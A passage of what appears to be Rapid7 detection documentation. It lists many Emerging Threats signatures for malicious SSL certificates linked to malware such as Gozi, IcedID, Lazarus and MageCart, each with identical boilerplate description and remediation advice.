Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (Gozi CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (Gozi CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (Gozi ISFB)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (Gozi ISFB)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (Gozi ISFB)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (GRIFFON CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (IcedID CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (JS/Ostap CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (jssLoader CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (JS WebSkimmer Exfil Site)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (Klingon RAT)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Malicious SSL Cert (Lazarus APT MalDoc 2020-11-30)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (Lazarus APT MalDoc DL 2020-05-05)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (LazarusGroup CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (MageCart)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (MageCart)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (MageCart)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (MageCart CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (MageCart CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (MageCart CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (MageCart CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (MageCart CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (MageCart CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (MageCart CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (MageCart CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (MageCart Exfil)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (MageCart Exfil Domain)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (MageCart Exfil Domain)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (MageCart Group 11 CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (MageCart Group 11 CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (MageCart Group 12)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (MageCart Group 12)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (MageCart Group 12)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (MageCart Group 12)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (MageCart Group 12)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (MageCart Group 12)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (MageCart Group 12)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (MageCart Group 12)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (MageCart Group 1/2 CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (MageCart Group 1/2 Staging Domain)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (MageCart Group 3 Staging Domain)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (MageCart Group 3 Staging Domain)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (MageCart Group 4 CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (MageCart Group 4 CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (MageCart Group 4 CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (MageCart Group 4 CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (MageCart Group 4 CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (MageCart Group 4 CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (MageCart Group 4 CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (MageCart Group 4 CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (MageCart Group 4 CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (MageCart Group 4 CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (MageCart Group 4 CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (MageCart Group 4 CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (MageCart Group 4 CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (MageCart Group 4 CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (MageCart Group 4 CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (MageCart Group 4 CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (MageCart Group 4 CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (MageCart Group 4 CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (MageCart Group 4 CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (MageCart Group 4 CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (MageCart Group 4 CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (MageCart Group 4 CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (MageCart Group 4 CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (MageCart Group 4 CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (MageCart Group 4 CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (MageCart Group 4 Staging Domain)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (MageCart Group 4 Staging Domain)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (MageCart Group 4 Staging Domain)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (MageCart Group 4 Staging Domain)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (MageCart Group 4 Staging Domain)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (MageCart Group 4 Staging Domain)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (MageCart Group 4 Staging Domain)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (MageCart Group 4 Staging Domain)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (MageCart Group 4 Staging Domain)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (MageCart Group 4 Staging Domain)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (MageCart Group 5 Staging Domain)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (Magecart/Skimmer CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (MageCart Staging Domain)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (MageCart Staging Domain)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (MalDoc 2020-03-09)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (MalDoc DL 2019-09-17 1)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (MalDoc DL) 2019-10-24

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (MalDoc DL 2019-11-15)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

